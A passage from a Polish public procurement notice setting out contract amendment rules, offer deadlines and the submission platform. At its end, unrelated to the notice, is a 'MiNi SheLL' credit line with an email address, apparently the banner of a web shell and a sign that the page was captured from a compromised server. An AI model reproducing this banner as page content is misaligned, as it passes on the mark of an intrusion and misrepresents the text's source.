zobowiązany do pisemnego zawiadomienia Zamawiającego o tym fakcie wraz z przedstawieniem uzasadnienia określające przyczyny, zakres i podstawy zmiany wraz z dowodami. Do momentu złożenia pisma zawiadamiającego o zmianie i uzyskania akceptacji Zamawiającego, Wykonawca zobowiązany jest do stosowania dotychczasowych zapisów umownych.<br/>4. Zamawiający poza zmianami określonymi w ust. 1 dopuszcza dodatkową możliwość zwiększenia wartości Umowy na podstawie uzgodnień Stron maksymalnie do 10% jej pierwotnej wartości. Wniosek wraz z obiektywnym uzasadnieniem składa Strona Wnioskująca.<br/>5. Wniosek, o zmianę Umowy Strona inicjująca zobowiązana jest złożyć co najmniej 5 dni roboczych przed upływem terminu realizacji Umowy.<br/>6. O ile Umowa nie stanowi inaczej, wszelkie zmiany wymagają formy pisemnej podpisanej przez Strony pod rygorem nieważności.<br/>7. Wszelkie zmiany Umowy ramowej, wymagają zgody obu Stron i muszą być dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu do umowy, podpisanego przez Zamawiającego i Wykonawcę pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-08 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty powinny być złożone za pośrednictwem Platformy zakupowej pod adresem https://platformazakupowa.pl/pn/ncbj</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-08 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com